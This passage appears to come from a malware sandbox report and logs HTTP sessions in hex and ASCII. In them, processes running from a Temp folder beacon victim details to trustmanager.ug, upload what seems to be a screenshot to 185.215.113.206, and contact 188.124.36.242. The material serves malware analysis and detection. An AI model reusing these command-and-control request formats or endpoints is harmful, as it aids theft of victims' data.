72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:07.846590042 CEST	16774	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
94	192.168.2.3	49822	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:07.906078100 CEST	16775	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:07.932229996 CEST	16790	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:07.932281971 CEST	16790	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
95	192.168.2.3	49821	185.215.113.206	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:07.927666903 CEST	16776	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: 185.215.113.206 Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:07.927692890 CEST	16776	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:07.927956104 CEST	16786	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:07.928103924 CEST	16789	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:07.984426022 CEST	16793	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:07.984721899 CEST	16796	OUT	Data Raw: 78 46 54 8b c4 90 b1 96 28 66 30 ce b6 d2 ca c1 55 27 31 30 88 e4 f0 0e fd b8 27 a1 c1 ac 3a 08 04 60 d6 b2 57 8b 5d cc d3 b3 b9 e8 5e 1f d1 4e 91 3e 91 36 a7 69 ac 5a 5e ca 35 21 73 67 79 2e c3 22 8b 42 4c b1 ab 46 0a ee ce dc 9d dc af 7e 95 04 Data Ascii: xFT(f0U'10':`W]^N>6iZ^5!sgy."BLF~<!kro2`OJw+ImZz<IxZG=vuP#Up=<tbUg$b;lo%3Q9]1{UXio
Aug 23, 2021 02:09:07.984790087 CEST	16799	OUT	Data Raw: c6 62 8a 7d 18 a2 c1 71 84 53 76 d4 98 a4 22 90 5c 8c 8a 42 2a 4c 53 71 4a c5 26 47 8a 4c 54 b8 a6 e2 a6 c5 5c 8f 14 62 a4 c5 37 14 ac 3b 8c c5 18 a7 d2 11 49 a1 dc 66 28 c5 2e 28 c5 2b 0e e3 48 a4 c5 3b 14 62 8b 00 cc 52 11 4f a4 c5 49 57 19 8a Data Ascii: b}qSv"\B*LSqJ&GLT\b7;If(.(+H;bROIW1OqAXbv))Rb7bE'zLRJ1@b(m8CK@"-BTF[#9Ss9B.Odg+jz}???XrWSG#V
Aug 23, 2021 02:09:07.984838009 CEST	16801	OUT	Data Raw: bd a4 52 b6 b5 3b a0 59 59 17 cb 48 81 04 8c e7 39 3c e7 8f 4f 4a f3 f1 7f c4 5e 86 4f 97 da 7b db 58 a3 e2 d4 d2 a0 f1 04 f6 ba 35 bf 95 6b 6d fb 92 de 63 31 91 c7 de 6e 49 ef c7 1c 71 5e 9b a8 bd 88 d5 2e c3 db dc 16 f3 9f 24 4e a0 13 b8 f6 d9 Data Ascii: R;YYH9<OJ^O{X5kmc1nIq^.$N^e/T48XP6~0y{?n?rykn>e]EFv"u;m:_65O/Okoddo?Z;%.vvWF[Hz("
Aug 23, 2021 02:09:07.985375881 CEST	16804	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:09:07.985434055 CEST	16807	OUT	Data Raw: 8a 5b 18 76 34 dd a7 d2 af f9 8a 7a 8a 5f dd 9f e1 a3 d9 f9 87 b4 7d 8c fe 73 4a 33 8a d0 f2 a2 34 1b 68 8f 7a 5e c9 87 b5 46 7d 2d 5c fb 18 ec d4 9f 63 6e c6 8f 65 21 fb 48 95 28 ab 06 d2 41 da 9a 6d e4 1d 8d 2e 46 35 38 f7 21 c5 18 a9 0c 6c 3f Data Ascii: [v4z_}sJ34hz^F}-\cne!H(Am.F58!l?vqb1E%/zP(.%-.(a\mQ`b1JQLBQE.K@)RsKZbRi:qER7)qE:bJ*+.)NQ~(bH9F3Rm>QsZiON
Aug 23, 2021 02:09:07.985621929 CEST	16809	OUT	Data Raw: 03 03 f4 a9 6d 2e a6 b2 ba 8e e6 06 db 24 67 20 f6 f7 07 d4 11 c1 15 ed cb 2e a4 e9 72 75 bd ef fd 74 3c 28 e6 35 55 5e 7e 96 b5 bf ae a7 b6 5a 6b 76 fa fc 3e 1f be 83 00 b5 e3 2c 91 e7 25 1c 5b cd 91 fe 7b 57 8b 7c 67 ff 00 92 87 37 fd 7b 45 fc Data Ascii: m.$g .rut<(5U^~Zkv>,%[{W\|g7{EdI$@? fPxPT1k~Wuo{QA )hBIESs@rl<RE.iZZniAisLh/zu\@4)V$PwsN8vUSd&
Aug 23, 2021 02:09:08.195074081 CEST	16875	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:09:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
96	192.168.2.3	49823	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:08.070200920 CEST	16865	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:08.095985889 CEST	16869	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:08.096015930 CEST	16869	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
97	192.168.2.3	49820	188.124.36.242	25802	C:\Users\user\AppData\Local\Temp\DB3B.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:08.170659065 CEST	16874	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 188.124.36.242:25802 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
